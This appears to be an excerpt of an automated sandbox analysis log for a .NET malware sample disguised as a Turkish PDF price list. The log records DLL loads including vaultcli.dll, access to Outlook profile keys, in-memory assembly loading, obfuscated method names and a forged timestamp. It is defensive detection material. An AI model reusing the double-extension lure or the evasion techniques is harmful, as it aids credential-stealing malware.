                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: oAlZ.pdbSHA2560 source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ctsdvwT.exe.3.dr
                    Source: Binary string: oAlZ.pdb source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ctsdvwT.exe.3.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.33c5330.0.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, GfC7QCCjIwYVW1JcP5.cs.Net Code: nDaRL6tOYk System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, GfC7QCCjIwYVW1JcP5.cs.Net Code: nDaRL6tOYk System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.5c10000.5.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.33ce948.1.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                    Source: ctsdvwT.exe.3.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeStatic PE information: 0xD684D858 [Tue Jan 18 10:39:20 2084 UTC]
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 0_2_0324EF83 push eax; iretd 0_2_0324EF89
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 0_2_07980720 push ebx; iretd 0_2_0798074E
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05698921 push 0C418B05h; ret 3_2_05698933
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05697410 push 18418B05h; ret 3_2_05697423
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_056972F1 push 10418B05h; ret 3_2_05697303
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05697F6B push 28418B05h; ret 3_2_05697F73
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05697F4B push 24418B05h; ret 3_2_05697F53
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05697F20 push 20418B05h; ret 3_2_05697F33
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05697F00 push 1C418B05h; ret 3_2_05697F13
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05697F83 push 2C418B05h; ret 3_2_05697F93
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05695E0C push 04418B05h; ret 3_2_05697403
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05697EE0 push 14418B05h; ret 3_2_05697EF3
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05697EC0 push 08418B05h; ret 3_2_05697ED3
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 5_2_0143EF82 push eax; iretd 5_2_0143EF89
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_0655D2D2 push es; ret 8_2_0655D2E0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_00FCEF82 push eax; iretd 10_2_00FCEF89
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeStatic PE information: section name: .text entropy: 7.861932673509319
                    Source: ctsdvwT.exe.3.drStatic PE information: section name: .text entropy: 7.861932673509319
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.33c5330.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, AsGyZCzgTMR4SKARrf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Epk4HbW4Dy', 'Veb4SGfuQh', 'cFb4WRXuxt', 'rrP4Ik2nUC', 'ly74fQWhpl', 'UHx44JHaiO', 'fMZ4clw8L2'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, vdlm9AVEXIdJgIbOd8.csHigh entropy of concatenated method names: 'p5IfnUhXrw', 'QZ7fAGQvEg', 'TJnfpTRde4', 't87fDqNciJ', 'ryMfshVBAf', 'PrWfyJtjGY', 'Wr3fC4HDoK', 'PsFfi9Sx6S', 'wQVfbULxr4', 'Hbnf8vSvfA'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, Pr610lZQJPnBqVUMpg.csHigh entropy of concatenated method names: 'u6bmUGdW5iu2xMOghvW', 'FnnivgdXLPWMaSNOoKA', 'ckysfiXw2J', 'm3Qs4jbwqq', 'IX9sc6vmcf', 'x6GWgtdy4b4o5SaFZM9', 'kCTBDDdeykJEvDTa5Zf'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, RpNtdwGk4mtG5ISUjB4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JE1cUipZAs', 'u6ecoPw8jl', 'OuhcO4DT33', 'DHQc5bG0p6', 'juccqO8PC2', 'pQEcj2NMkB', 'mqxc3ulSM6'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, Y7pkh21m9KcTRqOks4.csHigh entropy of concatenated method names: 'xsHHv04ykA', 'bWbHXSvlAs', 'L0KHM91JQR', 'VoHHZNqTEM', 'VVQHlQnjT2', 'yIJH2uAuLh', 'cbFH03AjoQ', 'HV3HPYO0wt', 'WNaHtxhkTg', 'sq8H7VZpBG'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, kUfAZeXkYTCn5qOeSR.csHigh entropy of concatenated method names: 'th9pYBetSL', 'UnYpxDhxlU', 'WZQpvcW6QP', 'D7IpXjj572', 'hq4pSyW3en', 'xCvpW6FXe4', 'H0qpIQNEX6', 'zskpfWeh81', 'f8fp4J5g93', 'W5EpchMyAD'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, pIOXZfAUCI1NJ36aoD.csHigh entropy of concatenated method names: 'Dispose', 'AgGGuslF2S', 'OEsTZxrloq', 'GnMZZZdAy3', 'nedGFlm9AE', 'EIdGzJgIbO', 'ProcessDialogKey', 'e8ATBuJ1oY', 'm7ZTG4qheE', 'i6fTThDw2E'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, HZbm2yOY3UJaCfctBW.csHigh entropy of concatenated method names: 'ToString', 'FD1W7lvgUD', 'VdNWZWoZOx', 'wgHWQGt9nO', 'xHnWl6OR2l', 'eJwW2ugL6q', 'nkqWK4PkDA', 'SkfW091axX', 'RnuWPdhNFB', 'Sa3WmMhRYF'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, zwVVUIKidr6EYTWQLK.csHigh entropy of concatenated method names: 'Br8sO5wCwg', 'nNTs5YG5kZ', 'WDYsqwt09N', 'ToString', 'DbssjlHLmJ', 'PbKs3gaTt7', 'IigwyqdbK72KaQIMOS4', 'BQOY2SduD6b7NHUCRBv', 'daiFtQdhjhBWBM0qhBF', 'q6H9mddL7w3QE0NFkcK'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, Np44hRR4WowCbwIcW3.csHigh entropy of concatenated method names: 'QqyGyvk3pj', 'jguGCvOKtN', 'vkYGbTCn5q', 'SeSG8Rv4BE', 'mLmGSAcwlj', 'i6fGW5f28c', 'U3ZVbX0dhCY4Qt0YnC', 'Y14lCnOh8N2bTHZbxP', 'CMxGGGqoWR', 'LEOGk8ZVRx'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, jvk3pjvyguvOKtNTem.csHigh entropy of concatenated method names: 'NYCAURke99', 'qGPAoxJvSy', 'nJbAO8BMwv', 'rkKA5EV0RC', 'jj1AqjRIsE', 'Vs3Ajl0QF0', 'dAPA3IHJ9v', 'S6AAV1u8bw', 'DnwAu3Yd2M', 'PZfAFm82lj'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, TmcsV7GBseGiKp8xPE5.csHigh entropy of concatenated method names: 'jmM4EPULpy', 'oKv4gPk6YE', 'Vuq4LFhyH9', 'Nc64YcjXNY', 'XOk4rxg9qp', 'YPk4xot3xS', 'UbT4aMSayQ', 'EJt4vRLqMF', 'QlF4XmwiP6', 'Dad49Go9Sq'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, tljs6fM5f28cZZv0ys.csHigh entropy of concatenated method names: 'JeisdRVj72', 'mCtsAT5Mne', 'GP0sDDJlnO', 'fyCsys5Kcs', 'o7ysCBU5r8', 'B3ADqHVExT', 'YqeDjtK71W', 'kYlD3nnUXM', 'MtYDVJTINc', 'KuSDur8C1L'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, nm7U2gjKQs5pqglCSj.csHigh entropy of concatenated method names: 'AIpIVGqPab', 'fWFIFVQg6i', 'crlfBYyXPl', 'LX3fGOq6uy', 'hfwI7reEcV', 'V8UIN9sphB', 'NS3I1KTKDu', 'QtvIUAuCwG', 'IqZIoSW5xM', 'P5RIOoXpR9'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, YibXPc0SHogQCZdwwV.csHigh entropy of concatenated method names: 'kFJynULVRv', 'Ae0yp6CGYi', 'L9Aysf8gmx', 'ESHsF4DoNA', 'XRXszE7Enh', 'rw1yBtkoF6', 'PM1yGTvdxF', 'ufTyTBUmFw', 'Cfxyk8y2aT', 'vYoyRGDnyO'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, zOV4n5T1q7gMf0ZNoO.csHigh entropy of concatenated method names: 'TDMLRxSlq', 'IPvYNAV0R', 'D5Yxr0vW6', 'eJeaii2tO', 'htIXKxNWl', 'QHd9X4hgB', 'VSty5dgafHJBLGQcDs', 'L9ZxrgkI2c4FOwgPyl', 'zag43uC14kqjIt9Hwi', 'Co7fEAgqS'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, xDw2ELFt4Xo5vfTyeF.csHigh entropy of concatenated method names: 'FJj4GgtrdP', 'Bou4kRb3ef', 'B1J4RDrXgk', 'TyY4nWlJew', 'RyY4A8sS0o', 'uhm4DcfChL', 'vtL4sOaOLM', 'XFnf3JAIlx', 'tApfVjgH7e', 'UBkfud9Axl'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, D4BEQu9Cihv1XbLmAc.csHigh entropy of concatenated method names: 'FZdDrgGrF7', 'qruDaEhtPu', 'eahpQE9AZw', 'USiplJGyD3', 'YRxp2IdlQs', 'zfqpKdFH5u', 'pbNp0lWCqD', 'TdnpPeSvXA', 'WvnpmZ6IHy', 'yMoptgwLHb'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, ixuyA3mZZVVGTgDOSP.csHigh entropy of concatenated method names: 'FuNyE6tpgX', 'XmNygceMv8', 'Gg2yLjCvJD', 'tk7yYglUrr', 'XBcyruOq2X', 'L11yxDPIj9', 'L1AyaXXYo9', 'x1Uyvsi6h7', 'aVyyXMxD0L', 'ruXy98ek8n'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, fuJ1oYu87Z4qheEs6f.csHigh entropy of concatenated method names: 'yi5fMMvFXp', 'X6NfZ8RsrQ', 'ppYfQmBWhQ', 'YuZflyYdZN', 'b0OfUA24Aw', 'o3Sf22AxRX', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, GfC7QCCjIwYVW1JcP5.csHigh entropy of concatenated method names: 'EoKkdVC7RB', 'NmmknX6cj9', 'FG8kAYvGag', 'nygkpFFDc2', 'hRhkDcfKOt', 'HTbks8qmcC', 'tkGkyWku91', 'Qo2kCygMrs', 'So5ki65NWO', 'FqQkbvOKYK'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, AsGyZCzgTMR4SKARrf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Epk4HbW4Dy', 'Veb4SGfuQh', 'cFb4WRXuxt', 'rrP4Ik2nUC', 'ly74fQWhpl', 'UHx44JHaiO', 'fMZ4clw8L2'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, vdlm9AVEXIdJgIbOd8.csHigh entropy of concatenated method names: 'p5IfnUhXrw', 'QZ7fAGQvEg', 'TJnfpTRde4', 't87fDqNciJ', 'ryMfshVBAf', 'PrWfyJtjGY', 'Wr3fC4HDoK', 'PsFfi9Sx6S', 'wQVfbULxr4', 'Hbnf8vSvfA'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, Pr610lZQJPnBqVUMpg.csHigh entropy of concatenated method names: 'u6bmUGdW5iu2xMOghvW', 'FnnivgdXLPWMaSNOoKA', 'ckysfiXw2J', 'm3Qs4jbwqq', 'IX9sc6vmcf', 'x6GWgtdy4b4o5SaFZM9', 'kCTBDDdeykJEvDTa5Zf'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, RpNtdwGk4mtG5ISUjB4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JE1cUipZAs', 'u6ecoPw8jl', 'OuhcO4DT33', 'DHQc5bG0p6', 'juccqO8PC2', 'pQEcj2NMkB', 'mqxc3ulSM6'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, Y7pkh21m9KcTRqOks4.csHigh entropy of concatenated method names: 'xsHHv04ykA', 'bWbHXSvlAs', 'L0KHM91JQR', 'VoHHZNqTEM', 'VVQHlQnjT2', 'yIJH2uAuLh', 'cbFH03AjoQ', 'HV3HPYO0wt', 'WNaHtxhkTg', 'sq8H7VZpBG'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, kUfAZeXkYTCn5qOeSR.csHigh entropy of concatenated method names: 'th9pYBetSL', 'UnYpxDhxlU', 'WZQpvcW6QP', 'D7IpXjj572', 'hq4pSyW3en', 'xCvpW6FXe4', 'H0qpIQNEX6', 'zskpfWeh81', 'f8fp4J5g93', 'W5EpchMyAD'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, pIOXZfAUCI1NJ36aoD.csHigh entropy of concatenated method names: 'Dispose', 'AgGGuslF2S', 'OEsTZxrloq', 'GnMZZZdAy3', 'nedGFlm9AE', 'EIdGzJgIbO', 'ProcessDialogKey', 'e8ATBuJ1oY', 'm7ZTG4qheE', 'i6fTThDw2E'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, HZbm2yOY3UJaCfctBW.csHigh entropy of concatenated method names: 'ToString', 'FD1W7lvgUD', 'VdNWZWoZOx', 'wgHWQGt9nO', 'xHnWl6OR2l', 'eJwW2ugL6q', 'nkqWK4PkDA', 'SkfW091axX', 'RnuWPdhNFB', 'Sa3WmMhRYF'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, zwVVUIKidr6EYTWQLK.csHigh entropy of concatenated method names: 'Br8sO5wCwg', 'nNTs5YG5kZ', 'WDYsqwt09N', 'ToString', 'DbssjlHLmJ', 'PbKs3gaTt7', 'IigwyqdbK72KaQIMOS4', 'BQOY2SduD6b7NHUCRBv', 'daiFtQdhjhBWBM0qhBF', 'q6H9mddL7w3QE0NFkcK'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, Np44hRR4WowCbwIcW3.csHigh entropy of concatenated method names: 'QqyGyvk3pj', 'jguGCvOKtN', 'vkYGbTCn5q', 'SeSG8Rv4BE', 'mLmGSAcwlj', 'i6fGW5f28c', 'U3ZVbX0dhCY4Qt0YnC', 'Y14lCnOh8N2bTHZbxP', 'CMxGGGqoWR', 'LEOGk8ZVRx'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, jvk3pjvyguvOKtNTem.csHigh entropy of concatenated method names: 'NYCAURke99', 'qGPAoxJvSy', 'nJbAO8BMwv', 'rkKA5EV0RC', 'jj1AqjRIsE', 'Vs3Ajl0QF0', 'dAPA3IHJ9v', 'S6AAV1u8bw', 'DnwAu3Yd2M', 'PZfAFm82lj'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, TmcsV7GBseGiKp8xPE5.csHigh entropy of concatenated method names: 'jmM4EPULpy', 'oKv4gPk6YE', 'Vuq4LFhyH9', 'Nc64YcjXNY', 'XOk4rxg9qp', 'YPk4xot3xS', 'UbT4aMSayQ', 'EJt4vRLqMF', 'QlF4XmwiP6', 'Dad49Go9Sq'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, tljs6fM5f28cZZv0ys.csHigh entropy of concatenated method names: 'JeisdRVj72', 'mCtsAT5Mne', 'GP0sDDJlnO', 'fyCsys5Kcs', 'o7ysCBU5r8', 'B3ADqHVExT', 'YqeDjtK71W', 'kYlD3nnUXM', 'MtYDVJTINc', 'KuSDur8C1L'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, nm7U2gjKQs5pqglCSj.csHigh entropy of concatenated method names: 'AIpIVGqPab', 'fWFIFVQg6i', 'crlfBYyXPl', 'LX3fGOq6uy', 'hfwI7reEcV', 'V8UIN9sphB', 'NS3I1KTKDu', 'QtvIUAuCwG', 'IqZIoSW5xM', 'P5RIOoXpR9'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, YibXPc0SHogQCZdwwV.csHigh entropy of concatenated method names: 'kFJynULVRv', 'Ae0yp6CGYi', 'L9Aysf8gmx', 'ESHsF4DoNA', 'XRXszE7Enh', 'rw1yBtkoF6', 'PM1yGTvdxF', 'ufTyTBUmFw', 'Cfxyk8y2aT', 'vYoyRGDnyO'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, zOV4n5T1q7gMf0ZNoO.csHigh entropy of concatenated method names: 'TDMLRxSlq', 'IPvYNAV0R', 'D5Yxr0vW6', 'eJeaii2tO', 'htIXKxNWl', 'QHd9X4hgB', 'VSty5dgafHJBLGQcDs', 'L9ZxrgkI2c4FOwgPyl', 'zag43uC14kqjIt9Hwi', 'Co7fEAgqS'
